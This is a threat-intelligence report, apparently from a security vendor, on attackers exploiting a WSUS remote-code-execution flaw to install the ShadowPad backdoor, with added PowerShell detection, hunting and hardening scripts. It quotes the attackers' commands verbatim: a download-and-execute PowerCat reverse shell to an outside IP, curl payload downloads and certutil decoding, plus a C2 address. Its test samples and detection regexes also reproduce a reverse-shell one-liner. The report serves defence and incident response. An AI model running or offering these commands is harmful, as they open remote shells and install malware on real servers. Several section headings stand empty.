
Following Microsoft's vulnerability disclosure on October 14, 2025, and the public release of a Proof of Concept (PoC) on October 22, attackers rapidly weaponized CVE-2025-59287, a critical Remote Code Execution (RCE) vulnerability in Windows Server Update Services (WSUS). Multiple sources have observed attacks targeting WSUS-enabled servers to deploy the ShadowPad backdoor. Attackers leverage PowerCat to obtain a system-level shell and utilize native system tools (curl and certutil) to deploy and install ShadowPad via DLL side-loading.
The key warning from this incident is the extremely short window between the public PoC release and in-the-wild exploitation. Attackers are abusing common tools such as PowerShell, certutil.exe, and curl.exe to minimize reliance on known malware, which makes signature-based detection harder. ShadowPad executes primarily in memory via DLL side-loading, injects itself into common Windows processes, and maintains persistence through Run keys and scheduled tasks to evade detection and retain long-term access. All Windows servers running WSUS, particularly those exposed to the Internet on TCP 8530/8531 or protected by weak access controls, are the primary targets.
Incident Description
ShadowPad is a privately sold backdoor, commonly associated with China-nexus APT groups. It establishes a covert and persistent access channel over HTTP/HTTPS on port 443, using browser-mimicking headers so that its traffic blends in with legitimate web traffic. WSUS is core enterprise infrastructure; by exploiting the RCE vulnerability to remotely acquire SYSTEM-level privileges on the WSUS server, attackers gain an initial foothold from which they can move laterally and control the entire environment.
Reconnaissance
Attackers scan for WSUS servers accessible via TCP 8530/8531, identifying targets vulnerable to CVE-2025-59287 (WSUS RCE).
Initial Access
By exploiting CVE-2025-59287 to execute commands with SYSTEM privileges, attackers immediately use PowerShell to download and execute PowerCat, obtaining an interactive CMD shell.
powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 154.17.26[.]41 -p 8080 -e cmd
Execution
Upon gaining initial access, attackers execute legitimate Windows utilities (curl.exe and certutil.exe) to install the ShadowPad malware.
curl hxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt & curl hxxp://149.28.78[.]189:42306/dll.txt -o C:\users\%ASD%\dll.txt & curl hxxp://149.28.78[.]189:42306/exe.txt -o C:\users\%ASD%\exe.txt
certutil -decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp
DLL Side-Loading Activating ShadowPad:
By placing the malicious DLL alongside a legitimate, trusted EXE, the attackers get the trusted executable to load the DLL for them; the DLL then decrypts and loads the ShadowPad core. This stage runs entirely in memory, so no decrypted ShadowPad payload touches disk.
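The execution chain above (PowerShell download-and-execute of PowerCat, curl.exe staging files under a user profile, certutil decoding into ProgramData) is visible in process-creation telemetry. The following is an added example, not CyCraft's code or part of the report: it turns those patterns into command-line detection rules, tests them against constructed sample command lines (the IPs are RFC 5737 documentation addresses, not indicators from the report), and optionally walks Security event 4688 on the WSUS host. It assumes command-line auditing is enabled for 4688 and that the IIS worker process w3wp.exe is the parent to prioritize, since WSUS runs under IIS.

```powershell
# Added example (not from CyCraft or the report): command-line rules for the
# living-off-the-land chain described above. Assumes Security event 4688 with
# "Include command line in process creation events" enabled on the WSUS host.

$LolbinRules = @(
    @{ Name  = 'PowerShell download-and-execute (IEX + DownloadString)'
       Regex = '(?i)powershell(\.exe)?.*(IEX|Invoke-Expression).*DownloadString' },
    @{ Name  = 'PowerCat reverse shell (-c host -p port -e cmd)'
       Regex = '(?i)powercat\s+-c\s+\S+\s+-p\s+\d+\s+-e\s' },
    @{ Name  = 'curl.exe writing a remote file under Users\ or ProgramData\'
       Regex = '(?i)\bcurl(\.exe)?\s+.*https?://\S+.*-o\s+"?[a-z]:\\(users|programdata)\\' },
    @{ Name  = 'certutil decoding a staged file into ProgramData\'
       Regex = '(?i)\bcertutil(\.exe)?\s+-decode\s+\S+\s+"?[a-z]:\\programdata\\' }
)

function Test-SuspiciousCommandLine {
    # Returns the name of the first matching rule, or $null when the line is clean.
    param([string]$CommandLine = '')
    foreach ($rule in $LolbinRules) {
        if ($CommandLine -match $rule.Regex) { return $rule.Name }
    }
    return $null
}

function Find-LolbinProcessEvents {
    # Walks recent 4688 events and reports those whose command line hits a rule.
    # A parent of w3wp.exe (the IIS worker hosting WSUS) gets the highest priority,
    # because that is where post-exploitation of the WSUS RCE would start.
    param([int]$MaxEvents = 20000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $evt    = $_
            $data   = ([xml]$evt.ToXml()).Event.EventData.Data
            $cmd    = [string](($data | Where-Object { $_.Name -eq 'CommandLine' }).'#text')
            $parent = [string](($data | Where-Object { $_.Name -eq 'ParentProcessName' }).'#text')
            $hit    = Test-SuspiciousCommandLine -CommandLine $cmd
            if ($hit) {
                [pscustomobject]@{
                    TimeCreated = $evt.TimeCreated
                    Rule        = $hit
                    Parent      = $parent
                    Priority    = $(if ($parent -like '*\w3wp.exe') { 'HIGH' } else { 'MEDIUM' })
                    CommandLine = $cmd
                }
            }
        }
}

# Constructed sample command lines (192.0.2.0/24 is a documentation range, not an
# indicator from the report) so the rules can be exercised offline.
$samples = @(
    'powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString(''http://192.0.2.10/p.ps1''); powercat -c 192.0.2.10 -p 8080 -e cmd',
    'curl http://192.0.2.20:42306/tmp.txt -o C:\users\svc-wsus\tmp.txt',
    'certutil -decode C:\users\svc-wsus\tmp.txt C:\programdata\0C137A80.tmp',
    'certutil -hashfile C:\Windows\System32\notepad.exe SHA256',      # benign admin use
    'powershell.exe -NoProfile -File C:\scripts\inventory.ps1'        # benign
)
foreach ($s in $samples) {
    $verdict = Test-SuspiciousCommandLine -CommandLine $s
    $tag = if ($verdict) { "ALERT [$verdict]" } else { 'ok' }
    "$tag`t$s"
}
# On a live host: Find-LolbinProcessEvents | Sort-Object Priority | Format-Table -AutoSize
```

The first three samples fire one rule each and the two benign lines stay quiet; the rules deliberately key on the combination of tool plus destination directory (Users\ or ProgramData\) rather than on the tool name alone, so routine certutil and curl use by administrators does not flood the alert queue.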
Persistence
Defense Evasion
Command and Control
Exfiltration
Data is exfiltrated via the C2 channel at 163.61.102[.]245:443.
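The report states that ShadowPad persists through Run keys and scheduled tasks and is activated by a legitimate EXE side-loading a malicious DLL. As an added hunting example that is not CyCraft's code or part of the report, the script below enumerates Run/RunOnce entries and scheduled-task actions that launch from user-writable locations, and lists signed EXE plus unsigned DLL pairs found in those locations, which is the on-disk shape a DLL side-load needs. The set of "user-writable roots" is this example's assumption; adjust it to the environment.

```powershell
# Added example (not from CyCraft or the report): hunt for Run-key / scheduled-task
# persistence launching from user-writable paths and for signed-EXE + unsigned-DLL
# pairs staged there. The roots below are an assumption for this example.

$WritableRoots = @("$env:ProgramData", "$env:SystemDrive\Users", "$env:windir\Temp")

function Test-UserWritablePath {
    # True when the command string references a location under one of the roots.
    param([string]$Path = '')
    foreach ($root in $WritableRoots) {
        if ($Path -like "*$root\*") { return $true }
    }
    return $false
}

function Get-SuspiciousRunKeys {
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    )
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        foreach ($p in (Get-ItemProperty -Path $k).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }    # skip PSPath/PSParentPath metadata
            if (Test-UserWritablePath ([string]$p.Value)) {
                [pscustomobject]@{ Source = $k; Name = $p.Name; Command = [string]$p.Value }
            }
        }
    }
}

function Get-SuspiciousScheduledTasks {
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {
            $exe  = [string]$a.Execute
            $args = [string]$a.Arguments
            if ((Test-UserWritablePath $exe) -or (Test-UserWritablePath $args)) {
                [pscustomobject]@{
                    Source  = "Task:$($task.TaskPath)$($task.TaskName)"
                    Name    = $task.TaskName
                    Command = "$exe $args".Trim()
                }
            }
        }
    }
}

function Get-SideLoadCandidates {
    # A validly signed EXE in a user-writable directory next to an unsigned DLL.
    # Legitimate software can look like this too, so treat hits as triage leads.
    foreach ($root in $WritableRoots) {
        Get-ChildItem -Path $root -Recurse -Filter *.exe -File -ErrorAction SilentlyContinue | ForEach-Object {
            $exe = $_
            $sig = Get-AuthenticodeSignature -FilePath $exe.FullName
            if ($sig.Status -ne 'Valid') { return }   # 'return' = next item in ForEach-Object
            Get-ChildItem -Path $exe.DirectoryName -Filter *.dll -File -ErrorAction SilentlyContinue | ForEach-Object {
                if ((Get-AuthenticodeSignature -FilePath $_.FullName).Status -ne 'Valid') {
                    [pscustomobject]@{
                        SignedExe   = $exe.FullName
                        Signer      = $sig.SignerCertificate.Subject
                        UnsignedDll = $_.FullName
                    }
                }
            }
        }
    }
}

Get-SuspiciousRunKeys          | Format-Table -AutoSize
Get-SuspiciousScheduledTasks   | Format-Table -AutoSize
Get-SideLoadCandidates         | Format-Table -AutoSize
```

Run it elevated so HKLM and all user profiles are readable. Any hit under ProgramData that pairs a signed vendor EXE with an unsigned DLL of the same era is worth pulling both files for analysis before deciding it is benign.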
Remove the WSUS RCE attack vector
Apply Microsoft's security updates for CVE-2025-59287 to all WSUS servers immediately. A reboot is required to complete mitigation and remove the RCE vector exploited in this campaign. If patching must be delayed, temporarily disable the WSUS server role or block TCP ports 8530/8531 at the host/perimeter firewall.
Manage WSUS exposure
Keep WSUS off the Internet by placing it behind a firewall. Restrict access to the subnets and administrators that need it. Limit outbound connections to Microsoft Update endpoints only and block unnecessary inbound traffic on ports 8530/8531. Enforce HTTPS on 8531 and disable the plain-HTTP listener on 8530.
Harden WSUS host configuration
Implement least-privilege ACLs to prevent unauthorized writes to Program Files, ProgramData, AppData, and Temp. Enforce an AppLocker/WDAC allow-list so that only approved, signed binaries run, which blocks the unauthorized DLL side-loading paths used here. Reduce the side-loading attack surface by keeping SafeDllSearchMode enabled and removing software that is not needed on the host.
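The three mitigation steps above (patch or remove the RCE vector, scope WSUS exposure, harden the host) can be checked and applied from one elevated PowerShell session on the WSUS server. The script below is an added example, not CyCraft's code or part of the report: the KB identifier is a placeholder to be taken from Microsoft's CVE-2025-59287 advisory, the allowed subnets are an assumption to replace with your own, the C2 address comes from the report's IOC section, and the wsusutil configuressl step assumes an HTTPS certificate is already bound to the WSUS site in IIS.

```powershell
# Added example (not from CyCraft or the report): check and apply the WSUS host
# mitigations from the report. Run elevated on the WSUS server (Windows Server,
# ServerManager and NetSecurity modules present).
#Requires -RunAsAdministrator
param(
    [string]   $PatchKB        = 'KB0000000',                        # PLACEHOLDER: take from the MS advisory
    [string[]] $AllowedSubnets = @('10.10.0.0/16', '10.20.5.0/24'),  # ASSUMED admin/client subnets
    [string[]] $C2Addresses    = @('163.61.102.245'),                # from the report's IOC section
    [switch]   $EmergencyBlock,                                      # close 8530/8531 entirely while unpatched
    [switch]   $EnforceSsl,                                          # needs an HTTPS binding in IIS first
    [string]   $WsusFqdn       = [System.Net.Dns]::GetHostEntry($env:COMPUTERNAME).HostName
)

$report = [ordered]@{}

# 1. Is the WSUS role present? Where it is not needed, remove it (Uninstall-WindowsFeature UpdateServices).
$wsus = Get-WindowsFeature -Name UpdateServices -ErrorAction SilentlyContinue
$report.WsusRoleInstalled = [bool]($wsus -and $wsus.Installed)

# 2. Patch state. The fix is only complete after a reboot, so surface pending reboots too.
$report.PatchInstalled = [bool](Get-HotFix -Id $PatchKB -ErrorAction SilentlyContinue)
$report.RebootPending  = (Test-Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired') -or
                         (Test-Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending')

# 3. Scope every inbound Allow rule on TCP 8530/8531 to the allowed subnets instead of Any.
$wsusRules = Get-NetFirewallPortFilter -ErrorAction SilentlyContinue |
    Where-Object { $_.Protocol -eq 'TCP' -and ($_.LocalPort -match '^853[01]$') } |
    Get-NetFirewallRule |
    Where-Object { $_.Direction -eq 'Inbound' -and $_.Action -eq 'Allow' }
foreach ($r in $wsusRules) { $r | Set-NetFirewallRule -RemoteAddress $AllowedSubnets }
$report.InboundRulesScoped = @($wsusRules).Count

# 4. Interim mitigation while unpatched: block the listener ports outright; lift it once patched and rebooted.
$blockName = 'WSUS: block 8530/8531 until CVE-2025-59287 is patched'
$existing  = Get-NetFirewallRule -DisplayName $blockName -ErrorAction SilentlyContinue
if ($EmergencyBlock -and -not $report.PatchInstalled) {
    if (-not $existing) {
        New-NetFirewallRule -DisplayName $blockName -Direction Inbound -Protocol TCP `
            -LocalPort 8530,8531 -Action Block -Profile Any | Out-Null
    }
    $report.EmergencyBlockActive = $true
} elseif ($existing -and $report.PatchInstalled -and -not $report.RebootPending) {
    Remove-NetFirewallRule -DisplayName $blockName
    $report.EmergencyBlockActive = $false
} else {
    $report.EmergencyBlockActive = [bool]$existing
}

# 5. Block egress to the C2 infrastructure named in the report (port 443).
foreach ($ip in $C2Addresses) {
    $name = "Block C2 egress $ip"
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $name -Direction Outbound -Protocol TCP `
            -RemoteAddress $ip -RemotePort 443 -Action Block -Profile Any | Out-Null
    }
}

# 6. SafeDllSearchMode=1 moves the current directory late in the DLL search order.
$smKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
Set-ItemProperty -Path $smKey -Name SafeDllSearchMode -Value 1 -Type DWord
$report.SafeDllSearchMode = (Get-ItemProperty -Path $smKey).SafeDllSearchMode

# 7. Optionally move WSUS to HTTPS on 8531 (wsusutil requires the certificate bound in IIS beforehand).
if ($EnforceSsl) {
    & "$env:ProgramFiles\Update Services\Tools\wsusutil.exe" configuressl $WsusFqdn
    $report.SslEnforcedFor = $WsusFqdn
}

[pscustomobject]$report
```

Run it once without switches to get the status object, then with -EmergencyBlock on hosts that cannot be patched today; after patching and rebooting, a second run removes the emergency block automatically because step 4 sees the hotfix present and no reboot pending. Step 3 only narrows existing Allow rules and never widens them, so it is safe to re-run.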
Detect and block malicious infrastructure
Enterprises should proactively monitor and block malicious infrastructure related to this incident, including IPs, URLs, and sample hashes. For details, please refer to the IOC section.
IP
URL
HTTP://163.61.102[.]245:443
Malicious File Paths
Commands with Q-X64 Parameters
CyCraft is a cybersecurity company founded in 2017, focusing on autonomous AI technology. Headquartered in Taiwan, it has subsidiaries in Japan and Singapore. CyCraft provides professional cybersecurity services to government agencies, police and defense forces, banks, and high-tech manufacturers throughout the Asia-Pacific region. It has received strong backing from the CID Group and Pavilion Capital, a Temasek Holdings Private Limited subsidiary.